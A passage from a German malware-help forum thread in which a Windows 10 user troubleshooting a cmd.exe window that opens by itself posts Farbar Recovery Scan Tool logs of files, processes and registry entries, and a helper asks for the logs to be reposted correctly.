2022-07-14 17:50 - 2022-07-14 17:50 - 000693248 _____ C:\Windows\system32\FsNVSDeviceSource.dll
2022-07-14 17:50 - 2022-07-14 17:50 - 000530944 _____ (curl, hxxps://curl.se/) C:\Windows\system32\curl.exe
2022-07-14 17:50 - 2022-07-14 17:50 - 000470528 _____ (curl, hxxps://curl.se/) C:\Windows\SysWOW64\curl.exe
2022-07-14 17:50 - 2022-07-14 17:50 - 000270848 _____ C:\Windows\system32\EsclScan.dll
2022-07-14 17:50 - 2022-07-14 17:50 - 000152064 _____ C:\Windows\system32\EsclProtocol.dll
2022-07-14 17:50 - 2022-07-14 17:50 - 000033280 _____ (Microsoft Corporation) C:\Windows\system32\mode.com
2022-07-14 17:50 - 2022-07-14 17:50 - 000026624 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mode.com
2022-07-14 17:50 - 2022-07-14 17:50 - 000020992 _____ (Microsoft Corporation) C:\Windows\system32\tree.com
2022-07-14 17:50 - 2022-07-14 17:50 - 000018944 _____ C:\Windows\SysWOW64\WsdProviderUtil.dll
2022-07-14 17:50 - 2022-07-14 17:50 - 000017920 _____ (Microsoft Corporation) C:\Windows\SysWOW64\tree.com
2022-07-14 17:50 - 2022-07-14 17:50 - 000014848 _____ (Microsoft Corporation) C:\Windows\system32\chcp.com
2022-07-14 17:50 - 2022-07-14 17:50 - 000012800 _____ (Microsoft Corporation) C:\Windows\SysWOW64\chcp.com
2022-07-14 17:50 - 2022-07-14 17:50 - 000011811 _____ C:\Windows\system32\DrtmAuthTxt.wim
2022-07-14 17:49 - 2022-07-14 17:49 - 002260480 _____ C:\Windows\system32\TextInputMethodFormatter.dll
2022-07-14 17:49 - 2022-07-14 17:49 - 000640512 _____ C:\Windows\system32\SettingSyncDownloadHelper.dll
2022-07-14 17:49 - 2022-07-14 17:49 - 000288768 _____ C:\Windows\system32\Windows.Management.InprocObjects.dll
2022-07-14 17:49 - 2022-07-14 17:49 - 000061952 _____ C:\Windows\system32\printticketvalidation.dll
2022-07-14 17:49 - 2022-07-14 17:49 - 000057344 _____ C:\Windows\system32\APMonUI.dll
2022-07-14 17:49 - 2022-07-14 17:49 - 000024576 _____ C:\Windows\system32\WsdProviderUtil.dll
2022-07-14 17:44 - 2022-07-14 17:44 - 000000000 ___HD C:\$WinREAgent
2022-07-13 14:31 - 2022-07-13 14:31 - 000328985 _____ C:\Users\chris\Downloads\WhatsApp Image 2022-07-13 at 14.26.58 (1).jpeg
2022-07-13 14:31 - 2022-07-13 14:31 - 000171434 _____ C:\Users\chris\Downloads\WhatsApp Image 2022-07-13 at 14.26.58.jpeg
2022-07-13 14:29 - 2022-07-13 14:29 - 000116599 _____ C:\Users\chris\Downloads\Probeklausur.pdf
2022-07-12 19:16 - 2022-07-12 19:16 - 000193337 _____ C:\Users\chris\Downloads\8104328_2022_Datenschutzrechtliche Einwilligung_vom_12.07.2022_20220712191654.pdf
2022-07-12 19:14 - 2022-07-12 19:14 - 000076728 _____ C:\Users\chris\Downloads\8104328_2022_Nr.003_Kontoauszug_vom_31.03.2022_20220712191454.pdf
2022-07-12 19:14 - 2022-07-12 19:14 - 000074601 _____ C:\Users\chris\Downloads\8104328_2022_Nr.001_Kontoauszug_vom_31.01.2022_20220712191449.pdf
2022-07-12 19:14 - 2022-07-12 19:14 - 000073937 _____ C:\Users\chris\Downloads\8104328_2022_Nr.002_Kontoauszug_vom_28.02.2022_20220712191452.pdf
2022-07-12 19:14 - 2022-07-12 19:14 - 000067892 _____ C:\Users\chris\Downloads\8104328_2022_Nr.004_Kontoauszug_vom_29.04.2022_20220712191457.pdf
2022-07-12 19:13 - 2022-07-12 19:13 - 000080969 _____ C:\Users\chris\Downloads\8104328_2022_Nr.005_Kontoauszug_vom_31.05.2022_20220712191347.pdf
2022-07-12 19:13 - 2022-07-12 19:13 - 000074623 _____ C:\Users\chris\Downloads\8104328_2022_Nr.006_Kontoauszug_vom_30.06.2022_20220712191345.pdf
2022-07-12 19:13 - 2022-07-12 19:13 - 000060149 _____ C:\Users\chris\Downloads\8104328_2022_Ihr Rechnungsabschluss_vom_30.06.2022_20220712191341.pdf
2022-07-12 16:32 - 2022-07-12 16:33 - 002107659 _____ C:\Users\chris\Documents\IMG_20220712_0001.pdf
2022-07-12 16:26 - 2022-07-12 16:26 - 000282547 _____ C:\Users\chris\Downloads\WhatsApp Image 2022-07-11 at 21.46.27.jpeg
2022-07-12 11:18 - 2022-07-12 11:18 - 000259752 _____ C:\Users\chris\Downloads\aufgaben_kap5.pdf
2022-07-12 11:18 - 2022-07-12 11:18 - 000258142 _____ C:\Users\chris\Downloads\aufgaben_kap2.pdf
2022-07-12 11:18 - 2022-07-12 11:18 - 000230124 _____ C:\Users\chris\Downloads\aufgaben_kap3.pdf
2022-07-12 11:18 - 2022-07-12 11:18 - 000223671 _____ C:\Users\chris\Downloads\aufgaben_kap1.pdf
2022-07-12 11:17 - 2022-07-12 11:17 - 000227308 _____ C:\Users\chris\Downloads\aufgaben_kap4.pdf
2022-07-11 19:12 - 2022-07-11 19:12 - 000299459 _____ C:\Users\chris\Downloads\Dritter_Hauptsatz.pdf
2022-07-11 11:05 - 2022-07-11 11:05 - 000087127 _____ C:\Users\chris\Downloads\Studienverlaufsbescheinigung [PDF] (3).pdf
2022-07-11 11:05 - 2022-07-11 11:05 - 000073060 _____ C:\Users\chris\Downloads\BAföG Bescheinigung [PDF] (3).pdf
2022-07-11 11:05 - 2022-07-11 11:05 - 000072760 _____ C:\Users\chris\Downloads\Immatrikulationsbescheinigung [PDF] (9).pdf
2022-07-10 17:01 - 2022-07-10 17:02 - 000319960 _____ C:\Users\chris\Documents\Perso_2.pdf
2022-07-07 19:16 - 2022-07-07 19:16 - 000251922 _____ C:\Users\chris\Downloads\Vorstellungsvortrage_W3-Physik_bioinspirierter_diskreter_Systeme147.pdf
2022-07-06 21:22 - 2022-07-06 21:22 - 000251922 _____ C:\Users\chris\Downloads\Vorstellungsvorträge W3-Physik bioinspirierter diskreter Systeme[147].pdf
2022-07-05 15:43 - 2022-07-05 15:44 - 000105989 _____ C:\Users\chris\Downloads\Super-PIN.pdf
2022-07-05 15:42 - 2022-07-05 15:42 - 000000754 _____ C:\Users\chris\Desktop\Dokumente - Verknüpfung.lnk
2022-07-05 14:48 - 2022-07-05 14:51 - 002613332 _____ C:\Users\chris\Documents\IMG_20220705_0001.pdf
2022-07-04 15:32 - 2022-07-04 15:35 - 002807761 _____ C:\Users\chris\Documents\IMG_20220704_0002.pdf
2022-07-04 15:18 - 2022-07-04 15:24 - 002778650 _____ C:\Users\chris\Documents\IMG_20220704_0001.pdf
2022-07-03 19:55 - 2022-07-03 19:55 - 000000000 ____D C:\Users\chris\AppData\LocalLow\Fek
2022-07-03 19:54 - 2020-08-18 04:51 - 000000000 ____D C:\Users\chris\Documents\WIN64
2022-07-03 18:32 - 2022-07-03 18:32 - 000176776 _____ C:\Users\chris\Downloads\Thermodynamik (1).pdf
2022-07-03 18:30 - 2022-07-03 18:30 - 000176789 _____ C:\Users\chris\Downloads\Thermodynamik.pdf
2022-07-03 17:37 - 2022-07-03 17:37 - 000078801 _____ C:\Users\chris\Downloads\_Rechnung Juni 2022 - Sebastian (1).pdf
2022-07-01 21:42 - 2022-07-01 21:42 - 000000000 ____D C:\Windows\SysWOW64\ncp
2022-07-01 21:42 - 2022-06-15 09:28 - 000100128 _____ (Avira Operations GmbH & Co. KG) C:\Windows\system32\Drivers\netprotection_network_filter.sys
2022-07-01 21:41 - 2022-07-20 22:19 - 000000000 ____D C:\Users\Public\Speedup Sessions
2022-07-01 21:41 - 2022-07-14 23:18 - 000001236 _____ C:\Users\Public\Desktop\Avira.lnk
2022-07-01 21:41 - 2022-07-14 18:27 - 000003478 _____ C:\Windows\system32\Tasks\Avira_Security_Update
2022-07-01 21:41 - 2022-07-01 21:41 - 005601064 _____ (Avira Operations GmbH & Co. KG) C:\Users\chris\Downloads\avira_en_sptl1_1567964500-1646663480__phpws-spotlighttrialflow3-control.exe
2022-07-01 21:41 - 2022-07-01 21:41 - 000003778 _____ C:\Windows\system32\Tasks\AviraSystemSpeedupVerify
2022-07-01 21:41 - 2022-07-01 21:41 - 000002818 _____ C:\Windows\system32\Tasks\Avira_Security_Systray
2022-07-01 21:41 - 2022-07-01 21:41 - 000000000 ____D C:\Program Files\Avira
2022-07-01 21:41 - 2022-06-30 11:17 - 000202584 _____ (Avira Operations GmbH) C:\Windows\system32\Drivers\rtp_filesystem_filter.sys
2022-07-01 21:41 - 2022-06-30 11:17 - 000193304 _____ (Avira Operations GmbH) C:\Windows\system32\Drivers\rtp_process_monitor.sys
2022-07-01 21:41 - 2022-06-30 11:17 - 000047560 _____ (Avira Operations GmbH) C:\Windows\system32\Drivers\rtp_traverse.sys
2022-07-01 21:41 - 2022-06-30 11:17 - 000024024 _____ (Avira Operations GmbH) C:\Windows\system32\Drivers\rtp_elam.sys
2022-07-01 21:41 - 2022-06-21 17:57 - 000230520 _____ (Avira Operations GmbH & Co. KG) C:\Windows\system32\Drivers\BdSentry.sys
2022-06-30 19:24 - 2022-06-30 19:24 - 000118047 _____ C:\Users\chris\Downloads\WhatsApp Image 2022-06-30 at 14.00.54 (1).jpeg
2022-06-30 19:03 - 2022-06-30 19:03 - 000118047 _____ C:\Users\chris\Downloads\WhatsApp Image 2022-06-30 at 14.00.54.jpeg
2022-06-30 18:12 - 2022-06-30 18:12 - 000146362 _____ C:\Users\chris\Downloads\u11 (5).pdf
2022-06-29 20:09 - 2022-06-29 20:09 - 000000000 ____D C:\Users\chris\AppData\LocalLow\Yabukaradoo
2022-06-29 19:51 - 2022-06-29 19:51 - 000000000 ____D C:\Users\chris\AppData\LocalLow\Laplace
2022-06-29 18:16 - 2022-06-29 18:16 - 000078535 _____ C:\Users\chris\Downloads\_Rechnung Juni 2022 - Sebastian.pdf
2022-06-29 12:28 - 2022-06-29 12:28 - 000146362 _____ C:\Users\chris\Downloads\u11 (4).pdf
2022-06-27 14:45 - 2022-06-27 14:47 - 002934336 _____ C:\Users\chris\Documents\IMG_20220627_0001.pdf
2022-06-26 16:46 - 2022-06-26 16:46 - 000000223 _____ C:\Users\chris\Desktop\Democracy 4.url
2022-06-26 12:40 - 2022-06-26 12:40 - 000146362 _____ C:\Users\chris\Downloads\u11 (3).pdf
2022-06-26 12:12 - 2022-06-26 12:12 - 000100026 _____ C:\Users\chris\Downloads\u10 (2).pdf
2022-06-22 21:49 - 2022-06-22 21:49 - 000100026 _____ C:\Users\chris\Downloads\u10 (1).pdf
2022-06-22 21:47 - 2022-06-22 21:47 - 000146362 _____ C:\Users\chris\Downloads\u11 (2).pdf
2022-06-22 19:14 - 2022-06-22 19:14 - 021972442 _____ C:\Users\chris\Downloads\7_Magnetische_Eigenschaften_von_Ferromagnetika (3).pdf
2022-06-21 11:38 - 2022-06-21 11:38 - 000620671 _____ C:\Users\chris\Downloads\fernabsatz_1741976447.pdf
2022-06-21 11:38 - 2022-06-21 11:38 - 000620671 _____ C:\Users\chris\Downloads\1741976447_c32aedbc-9e90-466b-ba75-004873f96082.pdf

==================== Ein Monat (geänderte) ==================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Datei/der Ordner verschoben.)

2022-07-21 12:17 - 2020-12-10 18:51 - 000000000 ____D C:\Program Files (x86)\Google
2022-07-21 12:15 - 2020-12-10 20:14 - 000000000 ____D C:\Program Files (x86)\Steam
2022-07-21 12:08 - 2022-04-19 20:35 - 000000000 ____D C:\Users\chris\AppData\Local\blow_the_leaves_away
2022-07-21 11:57 - 2020-12-10 18:58 - 000000000 ____D C:\ProgramData\NVIDIA
2022-07-21 11:40 - 2020-12-10 18:34 - 000000000 ___RD C:\Users\chris\OneDrive
2022-07-21 11:39 - 2022-03-02 16:07 - 000000000 ____D C:\Users\chris\AppData\Local\Oculus
2022-07-20 22:47 - 2022-03-02 17:27 - 000000000 ____D C:\Program Files\Oculus
2022-07-20 22:47 - 2019-12-07 11:14 - 000000000 ___HD C:\Program Files\WindowsApps
2022-07-20 22:47 - 2019-12-07 11:14 - 000000000 ____D C:\Windows\AppReadiness
2022-07-20 22:47 - 2019-12-07 11:14 - 000000000 ____D C:\ProgramData\regid.1991-06.com.microsoft
2022-07-20 22:46 - 2020-11-19 00:34 - 000000000 ____D C:\Windows\system32\SleepStudy
2022-07-20 22:30 - 2020-12-11 01:24 - 001822948 _____ C:\Windows\system32\PerfStringBackup.INI
2022-07-20 22:30 - 2019-12-07 16:50 - 000781196 _____ C:\Windows\system32\perfh007.dat
2022-07-20 22:30 - 2019-12-07 16:50 - 000166520 _____ C:\Windows\system32\perfc007.dat
2022-07-20 22:30 - 2019-12-07 11:13 - 000000000 ____D C:\Windows\INF
2022-07-20 22:25 - 2022-06-20 20:11 - 001183032 _____ C:\Windows\system32\rtp.db
2022-07-20 22:25 - 2020-12-11 01:18 - 000807280 _____ C:\Windows\system32\wpbbin.exe
2022-07-20 22:25 - 2020-12-11 01:18 - 000768408 _____ C:\Windows\system32\AsusUpdateCheck.exe
2022-07-20 22:25 - 2020-12-11 01:18 - 000008192 ___SH C:\DumpStack.log.tmp
2022-07-20 22:25 - 2020-11-19 01:34 - 000000006 ____H C:\Windows\Tasks\SA.DAT
2022-07-20 22:25 - 2019-12-07 11:03 - 000786432 _____ C:\Windows\system32\config\BBI
2022-07-20 22:24 - 2021-04-16 19:38 - 000000000 ____D C:\Users\Lisa\AppData\LocalLow\Temp
2022-07-20 12:32 - 2020-12-10 20:02 - 000000000 ____D C:\Users\chris\AppData\Local\D3DSCache
2022-07-20 12:15 - 2020-12-10 18:52 - 000002239 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2022-07-19 13:21 - 2020-12-10 18:31 - 000000000 ____D C:\Users\chris
2022-07-19 00:06 - 2021-02-19 17:32 - 000000000 ____D C:\Users\chris\AppData\Roaming\discord
2022-07-18 23:51 - 2021-02-19 17:32 - 000000000 ____D C:\Users\chris\AppData\Local\Discord
2022-07-18 12:19 - 2021-01-05 14:23 - 000004232 _____ C:\Windows\system32\Tasks\Opera scheduled Autoupdate 1609849433
2022-07-18 12:19 - 2021-01-05 14:23 - 000001389 _____ C:\Users\chris\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Opera-Browser.lnk
2022-07-18 12:14 - 2022-03-02 17:29 - 000000000 ____D C:\ProgramData\Oculus
2022-07-17 21:49 - 2019-12-07 11:03 - 000000000 ____D C:\Windows\CbsTemp
2022-07-17 21:40 - 2022-05-08 20:33 - 000000000 ____D C:\Windows\Minidump
2022-07-17 17:43 - 2020-11-19 01:37 - 000002436 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Edge.lnk
2022-07-17 17:43 - 2020-11-19 01:37 - 000002274 _____ C:\Users\Public\Desktop\Microsoft Edge.lnk
2022-07-15 12:03 - 2022-03-17 15:03 - 000000000 ____D C:\Users\chris\Downloads\DS4Windows
2022-07-15 11:22 - 2022-03-17 15:14 - 000281688 _____ C:\Windows\SysWOW64\PnkBstrB.xtr
2022-07-15 11:22 - 2022-03-17 15:13 - 000281688 _____ C:\Windows\SysWOW64\PnkBstrB.exe
2022-07-15 11:21 - 2022-03-17 15:06 - 000000000 ____D C:\Users\chris\AppData\Roaming\DS4Windows
2022-07-15 11:21 - 2021-09-09 14:12 - 000000000 ____D C:\Users\chris\AppData\Local\Ubisoft Game Launcher
2022-07-15 11:16 - 2021-01-12 20:22 - 000004240 _____ C:\Windows\system32\Tasks\Opera GX scheduled Autoupdate 1610475719
2022-07-15 11:16 - 2021-01-12 20:21 - 000001434 _____ C:\Users\chris\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Browser Opera GX.lnk
2022-07-15 01:48 - 2021-10-07 19:06 - 000001345 _____ C:\Users\chris\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\PC Health Check.lnk
2022-07-15 01:48 - 2021-10-07 19:06 - 000000000 ___RD C:\Users\chris\AppData\Local\PCHealthCheck
2022-07-14 20:50 - 2020-11-19 00:34 - 000258000 _____ C:\Windows\system32\FNTCACHE.DAT
2022-07-14 20:49 - 2019-12-07 11:14 - 000000000 ___RD C:\Windows\PrintDialog
2022-07-14 20:49 - 2019-12-07 11:14 - 000000000 ___RD C:\Windows\ImmersiveControlPanel
2022-07-14 20:49 - 2019-12-07 11:14 - 000000000 ____D C:\Windows\SysWOW64\WinMetadata
2022-07-14 20:49 - 2019-12-07 11:14 - 000000000 ____D C:\Windows\SystemResources
2022-07-14 20:49 - 2019-12-07 11:14 - 000000000 ____D C:\Windows\system32\WinMetadata
2022-07-14 20:49 - 2019-12-07 11:14 - 000000000 ____D C:\Windows\system32\setup
2022-07-14 20:49 - 2019-12-07 11:14 - 000000000 ____D C:\Windows\system32\oobe
2022-07-14 20:49 - 2019-12-07 11:14 - 000000000 ____D C:\Windows\system32\es-MX
2022-07-14 20:49 - 2019-12-07 11:14 - 000000000 ____D C:\Windows\system32\DDFs
2022-07-14 20:49 - 2019-12-07 11:14 - 000000000 ____D C:\Windows\ShellExperiences
2022-07-14 20:49 - 2019-12-07 11:14 - 000000000 ____D C:\Windows\ShellComponents
2022-07-14 20:49 - 2019-12-07 11:14 - 000000000 ____D C:\Windows\bcastdvr
2022-07-14 19:18 - 2022-03-17 15:13 - 000281688 _____ C:\Windows\SysWOW64\PnkBstrB.ex0
2022-07-14 18:50 - 2020-11-19 01:34 - 000000000 ____D C:\Windows\system32\Drivers\wd
2022-07-14 18:50 - 2019-12-07 11:03 - 000032768 _____ C:\Windows\system32\config\ELAM
2022-07-14 18:27 - 2021-04-19 21:21 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Avira
2022-07-14 17:49 - 2020-11-19 01:36 - 003010560 _____ (Microsoft Corporation) C:\Windows\SysWOW64\PrintConfig.dll
2022-07-14 17:44 - 2020-12-10 18:36 - 000000000 ____D C:\Windows\system32\MRT
2022-07-14 17:42 - 2020-12-10 18:36 - 146546848 ____C (Microsoft Corporation) C:\Windows\system32\MRT.exe
2022-07-14 11:45 - 2020-11-19 01:36 - 000003756 _____ C:\Windows\system32\Tasks\MicrosoftEdgeUpdateTaskMachineUA
2022-07-14 11:45 - 2020-11-19 01:36 - 000003632 _____ C:\Windows\system32\Tasks\MicrosoftEdgeUpdateTaskMachineCore
2022-07-13 18:13 - 2019-12-07 11:14 - 000000000 ____D C:\Windows\LiveKernelReports
2022-07-12 20:27 - 2020-12-16 21:04 - 000000000 ____D C:\Users\chris\AppData\Local\CrashDumps
2022-07-12 17:40 - 2021-12-12 18:38 - 000003584 _____ C:\Windows\system32\Tasks\OneDrive Reporting Task-S-1-5-21-292222086-413629167-3624375346-1001
2022-07-12 17:40 - 2020-12-10 18:34 - 000003376 _____ C:\Windows\system32\Tasks\OneDrive Standalone Update Task-S-1-5-21-292222086-413629167-3624375346-1001
2022-07-12 17:40 - 2020-12-10 18:31 - 000002395 _____ C:\Users\chris\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\OneDrive.lnk
2022-07-07 18:59 - 2021-01-05 14:23 - 000004464 _____ C:\Windows\system32\Tasks\Opera scheduled assistant Autoupdate 1609849435
2022-07-05 19:31 - 2020-12-10 21:55 - 000000000 ____D C:\ProgramData\boost_interprocess
2022-07-04 16:51 - 2020-12-14 13:53 - 000000000 ____D C:\ProgramData\CanonIJPLM
2022-07-03 19:36 - 2022-05-24 22:29 - 000000000 ____D C:\Users\chris\AppData\Roaming\RenPy
2022-07-01 21:42 - 2020-12-10 19:56 - 000000000 ____D C:\ProgramData\Avira
2022-07-01 21:42 - 2019-12-07 11:14 - 000000000 ___HD C:\Windows\ELAMBKUP
2022-07-01 21:41 - 2021-01-05 14:22 - 000000000 ____D C:\Program Files (x86)\Avira
2022-07-01 21:31 - 2020-12-10 18:37 - 000803176 _____ (Microsoft Corporation) C:\Windows\system32\MpSigStub.exe
2022-06-29 20:27 - 2022-06-17 20:37 - 000000000 ____D C:\Users\chris\AppData\Roaming\dryad_quest
2022-06-26 17:17 - 2021-03-06 15:41 - 000000000 ____D C:\Users\chris\Documents\My Games
2022-06-26 16:46 - 2021-03-05 14:55 - 000000000 ____D C:\Users\chris\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Steam
2022-06-26 16:43 - 2020-12-10 22:11 - 000000000 ____D C:\ProgramData\Riot Games
2022-06-26 10:01 - 2020-11-19 01:38 - 000000000 ____D C:\ProgramData\Packages
2022-06-22 14:44 - 2022-02-01 11:45 - 000001423 _____ C:\Users\chris\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Grammarly.lnk
2022-06-22 14:44 - 2022-02-01 11:45 - 000001415 _____ C:\Users\chris\Desktop\Grammarly.lnk

==================== Dateien im Wurzelverzeichnis einiger Verzeichnisse ========

2022-06-08 21:06 - 2022-06-08 21:06 - 000008412 _____ () C:\Users\chris\AppData\Local\recently-used.xbel

==================== SigCheck ============================

(Es ist kein automatischer Fix für Dateien vorhanden, die an der Verifikation gescheitert sind.)

==================== Ende von FRST.txt ========================
         

Alt 21.07.2022, 11:41   #14
cosinus
/// Winkelfunktion
/// TB-Süch-Tiger™
 
Windows 10:cmd.exe öffnet sich in unregelmäßigen abständen selber - Standard

Windows 10:cmd.exe öffnet sich in unregelmäßigen abständen selber



Du hast 2x die FRST.txt gepostet, bitte korrigiere das
__________________
Logfiles bitte immer in CODE-Tags posten

Alt 21.07.2022, 15:51   #15
g0s
 
Windows 10:cmd.exe öffnet sich in unregelmäßigen abständen selber - Standard

Windows 10:cmd.exe öffnet sich in unregelmäßigen abständen selber



Sorry, mein Fehler:
FRST:
Code:
ATTFilter
Untersuchungsergebnis von Farbar Recovery Scan Tool (FRST) (x64) Version: 21-07-2022
durchgeführt von chris (Administrator) auf DESKTOP-5G99FIR (21-07-2022 12:20:15)
Gestartet von C:\Users\chris\Downloads\FRST
Geladene Profile: chris
Plattform: Microsoft Windows 10 Home Version 21H1 19043.1826 (X64) Sprache: Deutsch (Deutschland)
Standard-Browser: Opera
Start-Modus: Normal

==================== Prozesse (Nicht auf der Ausnahmeliste) =================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Prozess geschlossen. Die Datei wird nicht verschoben.)

(ASUSTeK COMPUTER INC.) [Datei ist nicht signiert] C:\Program Files\ASUSTeKcomputer.Inc\Sonic Suite 3\Foundation\SS3Svc32.exe
(C:\Program Files (x86)\Steam\steam.exe ->) (Valve Corp. -> Valve Corporation) C:\Program Files (x86)\Steam\bin\cef\cef.win7x64\steamwebhelper.exe <7>
(C:\Program Files\ASUSTeKcomputer.Inc\Sonic Suite 3\Foundation\SS3Svc32.exe ->) (ASUSTeK COMPUTER INC.) [Datei ist nicht signiert] C:\Program Files\ASUSTeKcomputer.Inc\Sonic Suite 3\Foundation\x64\SS3Svc64.exe
(C:\Program Files\Avira\Endpoint Protection SDK\endpointprotection.exe ->) (Avira Operations GmbH & Co. KG -> Avira Operations GmbH) C:\Program Files\Avira\Endpoint Protection SDK\SentryEye.exe
(C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe ->) (NVIDIA Corporation -> NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NVIDIA GeForce Experience\NVIDIA Share.exe <3>
(C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe ->) (NVIDIA Corporation -> NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\ShadowPlay\nvsphelper64.exe
(C:\Program Files\Oculus\Support\oculus-runtime\OVRServiceLauncher.exe ->) (Oculus VR, LLC -> Facebook Technologies, LLC) C:\Program Files\Oculus\Support\oculus-runtime\OVRRedir.exe
(C:\Program Files\Oculus\Support\oculus-runtime\OVRServiceLauncher.exe ->) (Oculus VR, LLC -> Facebook Technologies, LLC) C:\Program Files\Oculus\Support\oculus-runtime\OVRServer_x64.exe
(C:\Users\chris\AppData\Roaming\GaomonTablet\GaomonTablet.exe ->) (GUANZHOU GAOMON ELECTRONIC TECHNOLOGY CO.,LTD . -> Guangzhou Gaomon Technology Co., Ltd.) C:\Users\chris\AppData\Roaming\GaomonTablet\TabletDriver.exe
(D:\Synapse3\Service\Razer Synapse Service.exe ->) (Razer USA Ltd. -> ) D:\Synapse3\UserProcess\Razer Synapse Service Process.exe
(explorer.exe ->) (Valve Corp. -> Valve Corporation) C:\Program Files (x86)\Steam\steam.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Update\1.3.36.132\GoogleCrashHandler.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Update\1.3.36.132\GoogleCrashHandler64.exe
(Microsoft Corporation -> Microsoft Corporation) C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe <5>
(Opera Norway AS -> Opera Software) C:\Users\chris\AppData\Local\Programs\Opera GX\88.0.4412.85\opera_autoupdate.exe <2>
(services.exe ->) (ASUSTeK Computer Inc. -> ) C:\Windows\System32\AsusUpdateCheck.exe
(services.exe ->) (Avira Operations GmbH & Co. KG -> Avira Operations GmbH & Co. KG) C:\Program Files (x86)\Avira\Optimizer Host\Avira.OptimizerHost.exe
(services.exe ->) (Avira Operations GmbH & Co. KG -> Avira Operations GmbH & Co. KG) C:\Program Files (x86)\Avira\VPN\Avira.VpnService.exe
(services.exe ->) (Avira Operations GmbH -> Avira Operations GmbH & Co. KG) C:\Program Files (x86)\Avira\Security\Avira.Spotlight.Service.exe
(services.exe ->) (Avira Operations GmbH -> Avira Operations GmbH) C:\Program Files\Avira\Endpoint Protection SDK\endpointprotection.exe
(services.exe ->) (Canon Inc. -> ) C:\Program Files (x86)\Canon\IJPLM\ijplmsvc.exe
(services.exe ->) (Even Balance, Inc. -> ) C:\Windows\SysWOW64\PnkBstrA.exe
(services.exe ->) (Microsoft Corporation -> Microsoft Corporation) C:\Program Files\Microsoft SQL Server\90\Shared\sqlwriter.exe
(services.exe ->) (Microsoft Windows Publisher -> Microsoft Corporation) C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2205.7-0\MsMpEng.exe
(services.exe ->) (nordvpn s.a. -> TEFINCOM S.A.) C:\Program Files\NordVPN\nordvpn-service.exe
(services.exe ->) (NVIDIA Corporation -> NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe <3>
(services.exe ->) (Nvidia Corporation -> NVIDIA Corporation) C:\Windows\System32\DriverStore\FileRepository\nv_dispi.inf_amd64_5292bbfbf575e2d2\Display.NvContainer\NVDisplay.Container.exe <2>
(services.exe ->) (Oculus VR, LLC -> Facebook Technologies, LLC) C:\Program Files\Oculus\Support\oculus-runtime\OVRServiceLauncher.exe
(services.exe ->) (Razer USA Ltd. -> Razer Inc) C:\Program Files (x86)\Razer\Razer Services\GMS\GameManagerService.exe
(services.exe ->) (Razer USA Ltd. -> Razer Inc.) C:\Program Files (x86)\Razer Chroma SDK\bin\RzChromaStreamServer.exe
(services.exe ->) (Razer USA Ltd. -> Razer Inc.) C:\Program Files (x86)\Razer Chroma SDK\bin\RzSDKServer.exe
(services.exe ->) (Razer USA Ltd. -> Razer Inc.) C:\Program Files (x86)\Razer Chroma SDK\bin\RzSDKService.exe
(services.exe ->) (Razer USA Ltd. -> Razer Inc.) C:\Program Files (x86)\Razer\Razer Services\Razer Central\RazerCentralService.exe
(services.exe ->) (Razer USA Ltd. -> Razer Inc.) D:\Synapse3\Service\Razer Synapse Service.exe
(services.exe ->) (Valve Corp. -> Valve Corporation) C:\Program Files (x86)\Common Files\Steam\SteamService.exe
(svchost.exe ->) (Avira Operations GmbH -> Avira Operations GmbH & Co. KG) C:\Program Files (x86)\Avira\Security\Avira.Spotlight.Systray.Application.exe
(svchost.exe ->) (GUANZHOU GAOMON ELECTRONIC TECHNOLOGY CO.,LTD . -> Guangzhou Gaomon Technology Co., Ltd.) C:\Users\chris\AppData\Roaming\GaomonTablet\GaomonTablet.exe
(svchost.exe ->) (Microsoft Corporation) C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.20970.0_x64__8wekyb3d8bbwe\HxOutlook.exe
(svchost.exe ->) (Microsoft Corporation) C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.20970.0_x64__8wekyb3d8bbwe\HxTsr.exe
(svchost.exe ->) (Microsoft Windows -> Microsoft Corporation) C:\Windows\ImmersiveControlPanel\SystemSettings.exe
(svchost.exe ->) (Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\dllhost.exe
(svchost.exe ->) (Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\smartscreen.exe
(svchost.exe ->) (Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\wlanext.exe
(svchost.exe ->) (Opera Norway AS -> Opera Software) C:\Users\chris\AppData\Local\Programs\Opera\assistant\browser_assistant.exe <2>
(wbem\unsecapp.exe ->) (NVIDIA Corporation -> Node.js) C:\Program Files (x86)\NVIDIA Corporation\NvNode\NVIDIA Web Helper.exe

==================== Registry (Nicht auf der Ausnahmeliste) ===================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Registryeintrag auf den Standardwert zurückgesetzt oder entfernt. Die Datei wird nicht verschoben.)

HKLM\...\Run: [RTHDVCPL] => C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe [9277520 2020-12-10] (Realtek Semiconductor Corp. -> Realtek Semiconductor)
HKLM-x32\...\Run: [IJNetworkScannerSelectorEX2] => C:\Program Files (x86)\Canon\IJ Network Scanner Selector EX2\CNMNSST2.exe [279240 2016-12-09] (Canon Inc. -> CANON INC.)
